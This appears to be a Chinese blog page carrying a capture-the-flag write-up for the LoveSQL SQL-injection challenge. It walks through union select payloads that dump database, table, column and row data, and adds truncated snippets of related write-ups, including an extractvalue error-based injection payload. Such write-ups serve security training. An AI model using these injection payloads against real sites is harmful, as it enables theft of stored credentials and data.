極客大挑戰 2019 LoveSQL 1

2021-10-12 05:00:39 字數 664 閱讀 2486

wp經大佬得

sql注入

?username=1』&password=1』

之後注入格式 ?username=1』 爆破 &password=1』

接下來就是按sql注入的流程操作:

1.測試有多少字段 order by 乙個數%23

測試每個字段對應的內容

2.爆出資料庫名 union select null,null,(select database())%23 假設庫名為geek

3.爆出資料庫裡的表 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema=『geek』)%23 推出兩個表geekuser和l0ve1ysq1

4.爆出表的列名 union select null,null,( select group_concat( column_name ) from information_schema.columns where table_name=『所爆出的表』)%23 一次只能查乙個表

5.爆出所有資料 union select null,null,group_concat(id,0x3a,username,0x3a,password) from 庫名.表名%23 同樣一次只能查乙個表

極客大挑戰 2019 PHP

開啟以後,是三個php原始碼,其中最重要的是class.php,如下 include flag.php error reporting 0 class name function wakeup function destruct if this username admin else 看了一下,這個...

極客大挑戰 2019 HardSQL wp

有過濾,抓個包fuzz一下 等號,空格等被過濾 發現可以用報錯注入,空格可以用括號代替 查表名username admin or extractvalue 1,concat 0x7e,select group concat column name from information schema.co...

極客大挑戰 2019 PHP

剛進入 我們可以看到這樣的乙個介面 根據內容提示,有備份 的習慣 日常後台掃瞄,發現有www.zip檔案,我們進行解壓得到 看到flag.php開啟檢視,發現沒有什麼有用的資訊。我們開啟index.php看看 我們可以看到通過get方式傳入引數select,並對引數select進行反序列化。接下來,...